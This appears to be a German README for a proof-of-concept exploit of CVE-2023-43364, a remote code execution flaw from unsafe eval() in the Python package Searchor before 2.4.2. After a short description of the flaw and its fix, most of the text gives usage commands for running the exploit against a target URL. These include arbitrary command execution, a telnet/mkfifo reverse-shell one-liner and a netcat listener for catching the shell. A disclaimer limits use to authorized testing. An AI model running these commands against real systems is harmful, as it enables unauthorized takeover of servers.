
POC exploit via unsafe `eval()` usage in Searchor (< 2.4.2)
Remote Code Execution (RCE) via unsicherer
eval()-Nutzung in Searchor (< 2.4.2)
Dieses Projekt demonstriert die Ausnutzung von CVE-2023-43364, einer Remote Code Execution (RCE)-Schwachstelle, die das Python-Paket Searchor (< 2.4.2) betrifft.
Das Problem wird durch die unsichere Verwendung von eval() auf benutzergesteuerte Eingaben verursacht, was Angreifern erlaubt, beliebigen Python-Code einzuschleusen und auszuführen.
Die Schwachstelle wurde durch Entfernen der unsicheren eval()-Nutzung behoben, wie im offiziellen Patch gezeigt:
Weitere technische Details und Hinweise:
Dieses Proof of Concept bietet mehrere Ausführungsmethoden, darunter Befehlausführung, Testvalidierung und Reverse Shells.
Führe einen einfachen Befehl (id) aus, um die Codeausführung zu überprüfen:
python3 CVE-2023-43364.py <URL> --test
Benutzerdefinierten Befehl ausführen Führe einen beliebigen Befehl auf dem Zielserver aus:
python3 CVE-2023-43364.py <URL> -a "whoami"
Beispiele:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Reverse Shell Starte einen Listener auf deinem Rechner:
nc -lvnp 4444
Führe den Exploit aus:
python3 CVE-2023-43364.py <URL> <LHOST>
Dieses Projekt ist vorgesehen für:
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Verwende diesen Exploit nur in kontrollierten Umgebungen oder auf Systemen, für die du eine ausdrückliche Erlaubnis zum Testen hast.